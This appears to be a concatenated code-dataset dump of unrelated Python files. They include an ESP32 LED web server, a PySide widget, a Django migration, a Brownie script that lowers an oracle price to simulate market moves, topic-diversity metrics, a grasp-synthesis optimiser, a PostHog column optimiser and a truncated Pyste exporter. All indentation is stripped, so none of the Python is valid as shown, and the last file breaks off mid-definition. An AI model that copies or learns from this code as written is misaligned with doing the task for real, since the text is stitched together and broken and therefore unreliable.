Author / Date:
Role:
- Connect to a Wi-Fi access point (connection sharing / hotspot on a phone)
- Display the network parameters in the console: IP address of the board
- Web server: display a page on the client (phone or tablet)
- Control an LED from the web page
- Display the LED state on the web page.
Version 1:
"""
try:
import usocket as socket
except:
import socket
from machine import Pin
import network
import esp
esp.osdebug(None)
import gc
gc.collect()
"""
ssid = 'REPLACE_WITH_YOUR_SSID'
password = '<PASSWORD>'
"""
ssid = 'REPLACE_WITH_YOUR_SSID'
password = '<PASSWORD>'
station = network.WLAN(network.STA_IF)
station.active(True)
station.connect(ssid, password)
while station.isconnected() == False:
pass
print('Connection successful')
print(station.ifconfig())
led_in = Pin(2, Pin.OUT)
led_ext = Pin(26, Pin.OUT)
def web_page():
if led_in.value() == 1:
gpio_state="ON"
else:
gpio_state="OFF"
html = """<html><head> <title>ESP Web Server</title> <meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="icon" href="data:,"> <style>html{font-family: Helvetica; display:inline-block; margin: 0px auto; text-align: center;}
h1{color: #0F3376; padding: 2vh;}p{font-size: 1.5rem;}.button{display: inline-block; background-color: #e7bd3b; border: none;
border-radius: 4px; color: white; padding: 16px 40px; text-decoration: none; font-size: 30px; margin: 2px; cursor: pointer;}
.button2{background-color: #4286f4;}</style></head><body> <h1>ESP Web Server</h1>
<p>GPIO state: <strong>""" + gpio_state + """</strong></p><p><a href="/?led=on"><button class="button">ON</button></a></p>
<p><a href="/?led=off"><button class="button button2">OFF</button></a></p></body></html>"""
return html
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 80))
s.listen(5)
while True:
print("\n---- Lire la requête et envoyer la page ----")
conn, addr = s.accept()
print('Got a connection from %s' % str(addr))
request = conn.recv(1024)
request = str(request)
print('Content = %s' % request)
led_on = request.find('/?led=on')
led_off = request.find('/?led=off')
if led_on == 6:
print('LED ON')
led_in.value(1)
led_ext.value(1)
if led_off == 6:
print('LED OFF')
led_in.value(0)
led_ext.value(0)
response = web_page()
conn.send('HTTP/1.1 200 OK\n')
conn.send('Content-Type: text/html\n')
conn.send('Connection: close\n\n')
conn.sendall(response)
conn.close()
| StarcoderdataPython |
4822031 | <reponame>LoicBoileau/Projet-S4---Robot-Delta
"""
/*
* This file is part of PySide: Python for Qt
*
* Copyright (C) 2009 Nokia Corporation and/or its subsidiary(-ies).
*
* Contact: PySide team <<EMAIL>>
*
* This library is free software; you can redistribute it and/or
* modify it under the terms of the GNU Lesser General Public License
* version 2.1 as published by the Free Software Foundation.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
* Lesser General Public License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
* 02110-1301 USA
*
*/
"""
from PySide.QtCore import *
from PySide.QtGui import *
from utils import *
class PixmapWidgetPrivate(object):
def __init__(self, pixmap=None):
self.topBorder = 0
self.leftBorder = 0
self.rightBorder = 0
self.bottomBorder = 0
self.pixmap = pixmap
class PixmapWidget(QGraphicsWidget):
def __init__(self, pixmap, parent = None):
QGraphicsWidget.__init__(self, parent)
self._d = PixmapWidgetPrivate()
self.setPixmap(pixmap)
self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed);
def pixmap(self):
return self._d.pixmap
def setPixmap(self, pixmap):
self._d.pixmap = pixmap
if pixmap.isNull():
self.setPreferredSize(QSizeF())
else:
self.setPreferredSize(QSizeF(pixmap.size()))
self.update()
self.updateGeometry()
def getBorders(self):
return (self._d.leftBorder, self._d.topBorder, self._d.rightBorder, self._d.bottomBorder)
def setBorders(self, left, top, right, bottom):
self._d.leftBorder = left
self._d.topBorder = top
self._d.rightBorder = right
self._d.bottomBorder = bottom
self.update()
def paint(self, painter, option, widget):
bDrawPixmap(painter, self._d.pixmap, self.boundingRect(), self._d.leftBorder, self._d.topBorder, self._d.rightBorder, self._d.bottomBorder)
| StarcoderdataPython |
95195 | import tornado.web
from settings import site_settings
apps = [
# (r'/prefix', 'app_name')
# appA
# __init__.py
# urls.py
(r"/api", "api"),
]
urls = [
# (r'relative_url', 'RequestHandler')
(r"/static", tornado.web.StaticFileHandler,
dict(path=site_settings['static_path'])),
]
| StarcoderdataPython |
1612028 | # Generated by Django 2.0.8 on 2019-03-19 16:14
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('caseFiles', '0006_casefile_file_pdf'),
]
operations = [
migrations.RemoveField(
model_name='casefile',
name='file_page1',
),
migrations.RemoveField(
model_name='casefile',
name='file_page2',
),
migrations.RemoveField(
model_name='casefile',
name='file_page3',
),
migrations.RemoveField(
model_name='casefile',
name='file_page4',
),
migrations.RemoveField(
model_name='casefile',
name='file_page5',
),
]
| StarcoderdataPython |
145443 | <gh_stars>1-10
from random import choice
def main():
amount_students = 1000
amount_wishes = 100
print(amount_students)
for student_number in range(1, amount_students + 1):
wishes = []
for _ in range(amount_wishes):
while str(wish := choice(range(1, amount_students + 1))) in wishes:
pass
wishes.append(str(wish))
print(" ".join(wishes))
if __name__ == "__main__":
main()
| StarcoderdataPython |
1681655 | <gh_stars>1-10
"""
The Loader module is the interface into the datagen data generation utility. It handles loading, parsing and
delegating the handling of various data types.
"""
import json
from typing import Union, Dict
from . import suppliers
from . import utils
from .exceptions import SpecException
from .model import DataSpec
from .schemas import validate_schema_for_spec
from .types import lookup_type, lookup_schema, registry
class Refs:
"""
Holder object for references
"""
def __init__(self, refspec):
if refspec:
self.refspec = refspec
else:
self.refspec = {}
def get(self, key):
""" get the ref for the key """
return self.refspec.get(key)
class Loader:
"""
Parent object for loading value suppliers from specs
"""
RESERVED = ['type', 'data', 'ref', 'refs', 'config']
def __init__(self, data_spec, data_dir='./data', enforce_schema=False):
raw_spec = utils.get_raw_spec(data_spec)
self.specs = preprocess_spec(raw_spec)
self.datadir = data_dir
self.enforce_schema = enforce_schema
self.cache = {}
self.refs = Refs(self.specs.get('refs'))
def get(self, key):
"""
Retrieve the value supplier for the given field or ref key
:param key: key to for field or ref name
"""
if key in self.cache:
return self.cache[key]
data_spec = self.specs.get(key)
if data_spec is None:
data_spec = self.refs.get(key)
if data_spec is None:
raise SpecException("No key " + key + " found in specs")
supplier = self.get_from_spec(data_spec)
self.cache[key] = supplier
return supplier
def get_from_spec(self, field_spec):
"""
Retrieve the value supplier for the given field spec
"""
if isinstance(field_spec, list):
spec_type = None
elif isinstance(field_spec, dict):
spec_type = field_spec.get('type')
else:
# assume it is data, so values?
spec_type = 'values'
if spec_type == 'configref':
raise SpecException(f'Cannot use configref as source of data: {json.dumps(field_spec)}')
if spec_type is None or spec_type == 'values':
if self.enforce_schema:
_validate_schema_for_spec(spec_type, field_spec)
supplier = suppliers.values(field_spec, self)
else:
handler = lookup_type(spec_type)
if handler is None:
raise SpecException('Unable to load handler for: ' + json.dumps(field_spec))
if self.enforce_schema:
_validate_schema_for_spec(spec_type, field_spec)
supplier = handler(field_spec, self)
if suppliers.is_cast(field_spec):
supplier = suppliers.cast_supplier(supplier, field_spec)
if suppliers.is_decorated(field_spec):
supplier = suppliers.decorated(field_spec, supplier)
if suppliers.is_buffered(field_spec):
supplier = suppliers.buffered(supplier, field_spec)
return supplier
def get_ref_spec(self, key):
""" returns the spec for the ref with the provided key """
return self.refs.get(key)
def _validate_schema_for_spec(spec_type, field_spec):
type_schema = lookup_schema(spec_type)
if type_schema is None:
return
validate_schema_for_spec(spec_type, field_spec, type_schema)
def preprocess_spec(data_spec: Union[Dict[str, Dict], DataSpec]):
"""
Uses the registered preprocessors to cumulatively update the spec
:param data_spec: to preprocess
:return: updated version of the spec after all preprocessors have run on it
"""
raw_spec = utils.get_raw_spec(data_spec)
updated = dict(raw_spec)
preprocessors = registry.preprocessors.get_all()
for name in preprocessors:
preprocessor = registry.preprocessors.get(name)
updated = preprocessor(updated)
return updated
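# Minimal usage sketch (illustrative only -- the spec grammar and the supplier
# API shown here are assumptions inferred from the code above, not a documented
# contract):
#
# raw_spec = {
#     "name": {"type": "values", "data": ["bob", "ann", "joe"]},
# }
# loader = Loader(raw_spec, data_dir="./data", enforce_schema=False)
# name_supplier = loader.get("name")  # value supplier built via suppliers.values(...)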
| StarcoderdataPython |
175806 | from brownie import (
accounts, ERC20KP3ROracle, UniswapV2Oracle, ProxyOracle, CoreOracle,
CurveOracle, WERC20, UbeswapV1Oracle, HomoraBank, UniswapV2SpellV1, SafeBox,
SimpleOracle, WStakingRewards
)
from brownie import interface
from .utils import *
import json
def main():
deployer = accounts.load('admin')
alice = accounts.load('alice')
f = open('scripts/dahlia_addresses.json')
addr = json.load(f)['mainnet']
celo = interface.IERC20Ex(addr['celo'])
ube = interface.IERC20Ex(addr['ube'])
dahlia_bank = HomoraBank.at(addr['dahlia_bank'])
uniswap_spell = UniswapV2SpellV1.at(addr['uniswap_spell'])
core_oracle = CoreOracle.at(addr['core_oracle'])
wstaking = WStakingRewards.at(addr['ube_celo_w_staking'])
celo.approve(dahlia_bank, 2**256-1, {'from': alice})
ube.approve(dahlia_bank, 2**256-1, {'from': alice})
# # open a position
# dahlia_bank.execute(
# 0,
# uniswap_spell,
# uniswap_spell.addLiquidityWERC20.encode_input(
# celo,
# ube,
# [10**10, # collateral amount celo
# 0, # collateral amount ube
# 0,
# 10**10, # borrow amount celo
# 0, # borrow amount ube
# 0,
# 0,
# 0],
# ),
# {
# 'from': alice,
# }
# )
# # open a position
# dahlia_bank.execute(
# 0,
# uniswap_spell,
# uniswap_spell.addLiquidityWStakingRewards.encode_input(
# celo,
# ube,
# [10**10, # collateral amount celo
# 0, # collateral amount ube
# 0,
# 10**10, # borrow amount celo
# 0, # borrow amount ube
# 0,
# 0,
# 0],
# wstaking
# ),
# {
# 'from': alice,
# }
# )
# market fluctuations
ubepx = core_oracle.getCELOPx(ube)
simple_oracle = SimpleOracle.deploy({'from': deployer})
simple_oracle.setCELOPx([ube], [int(ubepx/10)])
core_oracle.setRoute([
ube,
], [
simple_oracle,
], {'from': deployer})
print('Done!') | StarcoderdataPython |
3993 | """Hyper-distributions."""
from libqif.core.secrets import Secrets
from libqif.core.channel import Channel
from numpy import array, arange, zeros
from numpy import delete as npdelete
class Hyper:
def __init__(self, channel):
"""Hyper-distribution. To create an instance of this class it is
class it is necessary to have an instance of :py:class:`.Channel`
class. Once created an instance of :py:class:`.Hyper`, the constructor
generates the joint, outer and inner distributions.
Attributes
----------
channel : core.Channel
Channel object.
joint : numpy.ndarray
Matrix of joint distribution.
outer : numpy.ndarray
Outer distribution.
inners : numpy.ndarray
Matrix of inner distributions.
num_posteriors : int
Number of posterior distributions resulted by reducing the
hyper-distribution, i.e., remove columns that contains only
zeros and merge columns which one of them a linear combination
of the other.
Parameters
----------
channel : core.Channel
Channel object.
"""
self._check_types(channel)
self.channel = channel
self.joint = self._generate_joint_distribution()
self.outer, self.inners = self._generate_posteriors()
self._reduce_hyper()
self.num_posteriors = len(self.outer)
def update_prior(self, prior):
"""Update the prior distribution on set of secrets.
The number of secrets must match the current number of rows of the channel.
Parameters
----------
prior : list, numpy.ndarray
Prior distribution on the set of secrets. prior[i] is the
probability of secret named labels[i] beeing the real secret.
"""
self.channel.update_prior(prior)
self.joint = self._generate_joint_distribution()
self.outer, self.inners = self._generate_posteriors()
self._reduce_hyper()
self.num_posteriors = len(self.outer)
def _check_types(self, channel):
if type(channel) != type(Channel(Secrets(['x1','x2'], [1,0]), ['y1'], array([[1],[1]]))):
raise TypeError('The parameter \'channel\' must be a core.channel.Channel object')
def _generate_joint_distribution(self):
joint = []
channel_t = self.channel.matrix.T
for i in arange(self.channel.num_outputs):
joint.append(self.channel.secrets.prior * channel_t[i])
return array(joint).T
def _generate_posteriors(self):
joint_t = self.joint.T.copy()
outer = []
for i in arange(self.channel.num_outputs):
outer.append(joint_t[i].sum())
if outer[i] > 0:
joint_t[i] = joint_t[i]/outer[i]
return array(outer), joint_t.T
def _reduce_hyper(self):
"""Given the hyper-distribution generated by _generate_posteriors
remove columns with zeros and merge columns that are a linear
combination of others. This algorithm has time complexity O(n*m^2),
where n is the number of secrets and m is the number of outputs in
the channel.
"""
epsilon = 10**(-6)
# Delete inners that have 0 probability of occuring
zero_prob = self.outer < epsilon
self.outer = npdelete(self.outer, zero_prob, 0)
self.inners = npdelete(self.inners, zero_prob, 1)
delete_inner = [False] * len(self.outer)
for i in arange(self.inners.shape[1]):
for j in arange(i+1, self.inners.shape[1]):
# Check if inner i is equal to inner j
if (abs(self.inners[:,i] - self.inners[:,j]) < epsilon).sum() == self.channel.secrets.num_secrets:
delete_inner[j] = True # Delete inner j
self.outer[i] += self.outer[j] # Merge inner j into inner i
self.outer = npdelete(self.outer, delete_inner, 0)
self.inners = npdelete(self.inners, delete_inner, 1)
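# Illustrative usage sketch (mirrors the objects constructed in _check_types
# above; the prior, outputs and channel matrix are arbitrary example values):
#
# secrets = Secrets(['x1', 'x2'], [0.5, 0.5])
# channel = Channel(secrets, ['y1', 'y2'], array([[1, 0], [0, 1]]))
# hyper = Hyper(channel)
# hyper.outer, hyper.inners, hyper.num_posteriors  # outer dist., inner dists., reduced size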
| StarcoderdataPython |
1638719 | import sys
from ephyviewer.myqt import QT_MODE
if QT_MODE == 'PyQt5':
from . import icons_PyQt5 as icons
elif QT_MODE == 'PySide2':
from . import icons_PySide2 as icons
elif QT_MODE == 'PyQt4':
from . import icons_PyQt4 as icons
else:
raise ValueError('Could not load icons for unrecognized QT_MODE: ' + QT_MODE)
| StarcoderdataPython |
114966 | import torch
from .EMA import EMA
class PhysicsGuide:
def __init__(self, hand_model, object_model, penetration_model, fc_loss_model, args):
self.epsilon = 1e-4
self.hand_model = hand_model
self.object_model = object_model
self.penetration_model = penetration_model
self.fc_loss_model = fc_loss_model
self.args = args
self.grad_ema = EMA(0.98)
self.ones = torch.ones([self.args.batch_size, self.hand_model.num_points], device='cuda') # B x V
self.arange = torch.arange(self.args.batch_size).cuda()
self.rejection_count = torch.zeros([self.args.batch_size, 1], device='cuda', dtype=torch.long)
def initialize(self, object_code, z, contact_point_indices):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = self.compute_energy(object_code, z, contact_point_indices, verbose=True)
energy = linear_independence + force_closure + surface_distance + penetration + z_norm + normal_alignment
grad = torch.autograd.grad(energy.sum(), z)[0]
self.grad_ema.apply(grad)
return energy, grad, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
def compute_energy(self, object_code, z, contact_point_indices, verbose=False):
hand_verts = self.hand_model.get_vertices(z)
contact_point = torch.gather(hand_verts, 1, torch.tile(contact_point_indices.unsqueeze(-1), [1,1,3]))
contact_distance = self.object_model.distance(object_code, contact_point)
contact_normal = self.object_model.gradient(contact_point, contact_distance, create_graph=True, retain_graph=True)
contact_normal += torch.normal(0, self.epsilon, contact_normal.shape, device=contact_normal.device, dtype=contact_normal.dtype)
contact_normal = contact_normal / torch.norm(contact_normal, dim=-1, keepdim=True)
hand_normal = self.hand_model.get_surface_normals(verts=hand_verts)
hand_normal = torch.gather(hand_normal, 1, torch.tile(contact_point_indices.unsqueeze(-1), [1,1,3]))
hand_normal += torch.normal(0, self.epsilon, hand_normal.shape, device=hand_normal.device, dtype=hand_normal.dtype)
hand_normal = hand_normal / torch.norm(hand_normal, dim=-1, keepdim=True)
normal_alignment = 1 - ((hand_normal * contact_normal).sum(-1) + 1).sum(-1) / self.args.n_contact
linear_independence, force_closure = self.fc_loss_model.fc_loss(contact_point, contact_normal, object_code)
surface_distance = self.fc_loss_model.dist_loss(object_code, contact_point)
penetration = self.penetration_model.get_penetration(object_code, z) * 10 # B x V
hand_prior = self.hand_model.prior(z) * self.args.hprior_weight
if verbose:
return linear_independence, force_closure, surface_distance.sum(1), penetration.sum(1), hand_prior, normal_alignment
else:
return linear_independence + force_closure + surface_distance.sum(1) + penetration.sum(1) + hand_prior + normal_alignment
def get_stepsize(self, energy):
return 0.02600707 + energy.unsqueeze(1) * 0.03950357 * 1e-3
def get_temperature(self, energy):
return 0.02600707 + energy * 0.03950357
def optimize(self, energy, grad, object_code, z, contact_point_indices, verbose_energy):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = verbose_energy
batch_size = len(energy)
step_size = self.get_stepsize(energy)
temperature = self.get_temperature(energy)
switch = torch.rand([batch_size, 1], device='cuda')
# update z by langevin
noise = torch.normal(mean=0, std=self.args.noise_size, size=z.shape, device='cuda', dtype=torch.float) * step_size
new_z = z - 0.5 * grad / self.grad_ema.average.unsqueeze(0) * step_size * step_size + noise
# linear_independence, force_closure, surface_distance, penetration, hand_prior, normal_alignment = self.compute_energy(object_code, new_z, contact_point_indices, verbose=True)
# print('linear_independence', linear_independence.mean().detach().cpu().numpy())
# print('force_closure', force_closure.mean().detach().cpu().numpy())
# print('surface_distance', surface_distance.mean().detach().cpu().numpy())
# print('penetration', penetration.mean().detach().cpu().numpy())
# print('hand_prior', hand_prior.mean().detach().cpu().numpy())
# print('normal_alignment', normal_alignment.mean().detach().cpu().numpy())
# exit()
# update contact point by random sampling
new_contact_point_indices = contact_point_indices.clone()
update_indices = torch.randint(0, self.args.n_contact, size=[self.args.batch_size], device='cuda')
prob = self.ones.clone()
prob[torch.unsqueeze(self.arange, 1), contact_point_indices] = 0
# sample update_to indices
if self.args.hand_model == 'mano_fingertip':
update_to = torch.randint(0, self.hand_model.num_fingertips, size=[self.args.batch_size], device='cuda')
update_to = self.hand_model.fingertip_indices[update_to]
else:
update_to = torch.randint(0, self.hand_model.num_points, size=[self.args.batch_size], device='cuda')
new_contact_point_indices[self.arange, update_indices] = update_to
# merge by switch
update_H = ((switch < self.args.langevin_probability) * (self.rejection_count < 2))
new_z = new_z * update_H + z * ~update_H
new_contact_point_indices = new_contact_point_indices * (~update_H) + contact_point_indices * update_H
# compute new energy
new_linear_independence, new_force_closure, new_surface_distance, new_penetration, new_z_norm, new_normal_alignment = self.compute_energy(object_code, new_z, new_contact_point_indices, verbose=True)
new_energy = new_linear_independence + new_force_closure + new_surface_distance + new_penetration + new_z_norm + new_normal_alignment
new_grad = torch.autograd.grad(new_energy.sum(), new_z)[0]
# accept by Metropolis-Hasting algorithm
with torch.no_grad():
# metropolis-hasting
alpha = torch.rand(self.args.batch_size, device='cuda', dtype=torch.float)
accept = alpha < torch.exp((energy - new_energy) / temperature)
z[accept] = new_z[accept]
contact_point_indices[accept] = new_contact_point_indices[accept]
energy[accept] = new_energy[accept]
grad[accept] = new_grad[accept]
linear_independence[accept] = new_linear_independence[accept]
force_closure[accept] = new_force_closure[accept]
surface_distance[accept] = new_surface_distance[accept]
penetration[accept] = new_penetration[accept]
z_norm[accept] = new_z_norm[accept]
normal_alignment[accept] = new_normal_alignment[accept]
self.rejection_count[accept] = 0
self.rejection_count[~accept] += 1
self.grad_ema.apply(grad)
# print('delta-z: %f delta-i: %f accept: %f'%(torch.norm(z - old_z), torch.norm(contact_point_indices.float() - old_ind.float()), accept.sum()))
return energy, grad, z, contact_point_indices, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
def refine(self, energy, grad, object_code, z, contact_point_indices, verbose_energy):
linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment = verbose_energy
step_size = 0.1
temperature = 1e-3
# update z by langevin
noise = torch.normal(mean=0, std=self.args.noise_size, size=z.shape, device='cuda', dtype=torch.float) * step_size
new_z = z - 0.5 * grad / self.grad_ema.average.unsqueeze(0) * step_size * step_size + noise
new_linear_independence, new_force_closure, new_surface_distance, new_penetration, new_z_norm, new_normal_alignment = self.compute_energy(object_code, new_z, contact_point_indices, verbose=True)
new_energy = new_linear_independence + new_force_closure + new_surface_distance + new_penetration + new_z_norm + new_normal_alignment
new_grad = torch.autograd.grad(new_energy.sum(), new_z)[0]
self.grad_ema.apply(grad)
with torch.no_grad():
# metropolis-hasting
alpha = torch.rand(self.args.batch_size, device='cuda', dtype=torch.float)
accept = alpha < torch.exp((energy - new_energy) / temperature)
z[accept] = new_z[accept]
energy[accept] = new_energy[accept]
grad[accept] = new_grad[accept]
linear_independence[accept] = new_linear_independence[accept]
force_closure[accept] = new_force_closure[accept]
surface_distance[accept] = new_surface_distance[accept]
penetration[accept] = new_penetration[accept]
z_norm[accept] = new_z_norm[accept]
normal_alignment[accept] = new_normal_alignment[accept]
self.grad_ema.apply(grad)
return energy, grad, z, contact_point_indices, [linear_independence, force_closure, surface_distance, penetration, z_norm, normal_alignment]
| StarcoderdataPython |
1608395 | import numpy as np
from utils.rbo import rbo as rbo_utils
from itertools import combinations
def proportion_common_words(topics, topk=10):
"""
compute the proportion of common (repeated) words across the topics
Parameters
----------
topics: a list of lists of words
topk: top k words on which the topic diversity will be computed
Returns
-------
pcw : proportion of common words
"""
if topk > len(topics[0]):
raise Exception('Words in topics are less than '+str(topk))
else:
unique_words = set()
for topic in topics:
unique_words = unique_words.union(set(topic[:topk]))
puw = 1 - (len(unique_words) / (topk * len(topics)))
return puw
def rbo(topics, weight=0.9, topk=10):
"""
compute rank-biased overlap
Parameters
----------
topics: a list of lists of words
topk: top k words on which the topic diversity
will be computed
weight: p (float), default 0.9: weight of each
agreement at depth d: p**(d-1). When set
to 1.0, there is no weighting and rbo reduces
to average overlap.
Returns
-------
rbo : score of the rank biased overlap over the topics
"""
if topk > len(topics[0]):
raise Exception('Words in topics are less than topk')
else:
collect = []
for list1, list2 in combinations(topics, 2):
word2index = get_word2index(list1, list2)
indexed_list1 = [word2index[word] for word in list1]
indexed_list2 = [word2index[word] for word in list2]
rbo_val = rbo_utils(indexed_list1[:topk], indexed_list2[:topk], p=weight)[2]
collect.append(rbo_val)
return np.mean(collect)
def pairwise_jaccard_similarity(topics, topk=10):
sim = 0
count = 0
for list1, list2 in combinations(topics, 2):
intersection = len(list(set(list1[:topk]).intersection(list2[:topk])))
union = (len(list1[:topk]) + len(list2[:topk])) - intersection
count = count + 1
sim = sim + (float(intersection) / union)
return sim/count
def get_word2index(list1, list2):
words = set(list1)
words = words.union(set(list2))
word2index = {w: i for i, w in enumerate(words)}
return word2index
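# Illustrative usage sketch (toy topics; topk must not exceed the topic length):
#
# topics = [
#     ["cat", "dog", "fish", "bird"],
#     ["cat", "dog", "horse", "goat"],
# ]
# print(proportion_common_words(topics, topk=4))
# print(rbo(topics, weight=0.9, topk=4))
# print(pairwise_jaccard_similarity(topics, topk=4))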
| StarcoderdataPython |
3307260 | import json
import os
import unittest
from mock import Mock
from testfixtures import compare, Replacer
from deployfish.terraform import Terraform
YAML = {
'statefile': 's3://foobar/baz',
'lookups': {
'lookup1': 'proxy-{environment}-cluster-name',
'lookup2': 'proxy-{environment}-elb-id',
'lookup3': 'proxy-{environment}-autoscalinggroup-name',
'lookup4': 'security-group-list'
}
}
class TestTerraform_load_yaml(unittest.TestCase):
def setUp(self):
with Replacer() as r:
r.replace('deployfish.terraform.Terraform.get_terraform_state', Mock())
self.terraform = Terraform(YAML)
def test_lookups(self):
compare(self.terraform.lookups, {
'lookup1': 'proxy-{environment}-cluster-name',
'lookup2': 'proxy-{environment}-elb-id',
'lookup3': 'proxy-{environment}-autoscalinggroup-name',
'lookup4': 'security-group-list',
})
class TestTerraform_get_terraform_state(unittest.TestCase):
def setUp(self):
with Replacer() as r:
current_dir = os.path.dirname(os.path.abspath(__file__))
fname = os.path.join(current_dir, 'terraform.tfstate')
with open(fname) as f:
tfstate = json.loads(f.read())
get_mock = r('deployfish.terraform.Terraform._get_state_file_from_s3', Mock())
get_mock.return_value = tfstate
self.terraform = Terraform(YAML)
def test_lookup(self):
self.assertTrue('proxy-qa-cluster-name' in self.terraform)
class TestTerraform_lookup(unittest.TestCase):
def setUp(self):
with Replacer() as r:
current_dir = os.path.dirname(os.path.abspath(__file__))
fname = os.path.join(current_dir, 'terraform.tfstate')
with open(fname) as f:
tfstate = json.loads(f.read())
get_mock = r('deployfish.terraform.Terraform._get_state_file_from_s3', Mock())
get_mock.return_value = tfstate
self.terraform = Terraform(YAML)
def test_lookup(self):
self.assertEqual(self.terraform.lookup('lookup1', {'environment': 'qa'}), 'foobar-proxy-qa')
self.assertEqual(self.terraform.lookup('lookup1', {'environment': 'prod'}), 'foobar-proxy-prod')
self.assertListEqual(self.terraform.lookup('lookup4', {}), ['sg-1234567', 'sg-2345678', 'sg-3456789'])
| StarcoderdataPython |
4832251 | <filename>ee/clickhouse/queries/column_optimizer.py
from typing import List, Set, Tuple, Union, cast
from ee.clickhouse.materialized_columns.columns import ColumnName, get_materialized_columns
from ee.clickhouse.models.action import get_action_tables_and_properties, uses_elements_chain
from ee.clickhouse.models.property import extract_tables_and_properties
from posthog.constants import TREND_FILTER_TYPE_ACTIONS
from posthog.models.entity import Entity
from posthog.models.filters import Filter
from posthog.models.filters.mixins.utils import cached_property
from posthog.models.filters.path_filter import PathFilter
from posthog.models.filters.retention_filter import RetentionFilter
from posthog.models.property import Property, PropertyName, PropertyType
from posthog.models.team import Team
class ColumnOptimizer:
"""
This class is responsible for figuring out what columns can and should be materialized based on the query filter.
This speeds up queries since clickhouse ends up selecting less data.
"""
def __init__(self, filter: Union[Filter, PathFilter, RetentionFilter], team_id: int):
self.filter = filter
self.team_id = team_id
@cached_property
def materialized_event_columns_to_query(self) -> List[ColumnName]:
"Returns a list of event table columns containing materialized properties that this query needs"
materialized_columns = get_materialized_columns("events")
return [
materialized_columns[property_name]
for property_name, type in self._used_properties_with_type("event")
if property_name in materialized_columns
]
@cached_property
def materialized_person_columns_to_query(self) -> List[ColumnName]:
"Returns a list of person table columns containing materialized properties that this query needs"
materialized_columns = get_materialized_columns("person")
return [
materialized_columns[property_name]
for property_name, type in self._used_properties_with_type("person")
if property_name in materialized_columns
]
@cached_property
def should_query_event_properties_column(self) -> bool:
return len(self.materialized_event_columns_to_query) != len(self._used_properties_with_type("event"))
@cached_property
def should_query_person_properties_column(self) -> bool:
return len(self.materialized_person_columns_to_query) != len(self._used_properties_with_type("person"))
@cached_property
def is_using_person_properties(self) -> bool:
return len(self._used_properties_with_type("person")) > 0
@cached_property
def should_query_elements_chain_column(self) -> bool:
"Returns whether this query uses elements_chain"
has_element_type_property = lambda properties: any(prop.type == "element" for prop in properties)
if has_element_type_property(self.filter.properties):
return True
if self.filter.filter_test_accounts:
test_account_filters = Team.objects.only("test_account_filters").get(id=self.team_id).test_account_filters
properties = [Property(**prop) for prop in test_account_filters]
if has_element_type_property(properties):
return True
# Both entities and funnel exclusions can contain nested elements_chain inclusions
for entity in self.filter.entities + cast(List[Entity], self.filter.exclusions):
if has_element_type_property(entity.properties):
return True
# :TRICKY: Action definition may contain elements_chain usage
#
# See ee/clickhouse/models/action.py#format_action_filter for an example
if entity.type == TREND_FILTER_TYPE_ACTIONS:
if uses_elements_chain(entity.get_action()):
return True
return False
@cached_property
def properties_used_in_filter(self) -> Set[Tuple[PropertyName, PropertyType]]:
"Returns list of properties + types that this query would use"
result: Set[Tuple[PropertyName, PropertyType]] = set()
result |= extract_tables_and_properties(self.filter.properties)
if self.filter.filter_test_accounts:
test_account_filters = Team.objects.only("test_account_filters").get(id=self.team_id).test_account_filters
result |= extract_tables_and_properties([Property(**prop) for prop in test_account_filters])
# Some breakdown types read properties
#
# See ee/clickhouse/queries/trends/breakdown.py#get_query or
# ee/clickhouse/queries/breakdown_props.py#get_breakdown_prop_values
if self.filter.breakdown_type in ["event", "person"]:
# :TRICKY: We only support string breakdown for event/person properties
assert isinstance(self.filter.breakdown, str)
result.add((self.filter.breakdown, self.filter.breakdown_type))
# Both entities and funnel exclusions can contain nested property filters
for entity in self.filter.entities + cast(List[Entity], self.filter.exclusions):
result |= extract_tables_and_properties(entity.properties)
# Math properties are also implicitly used.
#
# See ee/clickhouse/queries/trends/util.py#process_math
if entity.math_property:
result.add((entity.math_property, "event"))
# :TRICKY: If action contains property filters, these need to be included
#
# See ee/clickhouse/models/action.py#format_action_filter for an example
if entity.type == TREND_FILTER_TYPE_ACTIONS:
result |= get_action_tables_and_properties(entity.get_action())
return result
def _used_properties_with_type(self, property_type: PropertyType) -> Set[Tuple[PropertyName, PropertyType]]:
return set((name, type) for name, type in self.properties_used_in_filter if type == property_type)
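
# Hypothetical usage sketch (not from the original file): it assumes a configured
# PostHog/Django environment; the filter payload and `team` object are invented
# placeholders for illustration only.
#
#   filter = Filter(data={"events": [{"id": "$pageview"}],
#                         "properties": [{"key": "$browser", "value": "Chrome"}]})
#   optimizer = ColumnOptimizer(filter, team.pk)
#   optimizer.materialized_event_columns_to_query   # event columns that can be selected directly
#   optimizer.should_query_elements_chain_column    # whether elements_chain has to be read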
| StarcoderdataPython |
3272008 | <reponame>acidicMercury8/xray-1.0
import exporters
from Exporter import Exporter
from declarations import *
from enumerate import enumerate
from settings import *
from CodeUnit import CodeUnit
from EnumExporter import EnumExporter
#==============================================================================
# ClassExporter
#==============================================================================
class ClassExporter(Exporter):
'Generates boost.python code to export a class declaration'
def __init__(self, info, parser_tail=None):
Exporter.__init__(self, info, parser_tail)
# sections of code
self.sections = {}
# template: each item in the list is an item into the class_<...>
# section.
self.sections['template'] = []
# constructor: each item in the list is a parameter to the class_
# constructor, like class_<C>(...)
self.sections['constructor'] = []
# inside: everything within the class_<> statement
self.sections['inside'] = []
# scope: items outside the class statement but within its scope.
# scope* s = new scope(class<>());
# ...
# delete s;
self.sections['scope'] = []
# declarations: outside the BOOST_PYTHON_MODULE macro
self.sections['declaration'] = []
self.sections['include'] = []
# a list of Constructor instances
self.constructors = []
self.wrapper_generator = None
# a list of code units, generated by nested declarations
self.nested_codeunits = []
def ScopeName(self):
return _ID(self.class_.FullName()) + '_scope'
def Name(self):
return self.class_.FullName()
def SetDeclarations(self, declarations):
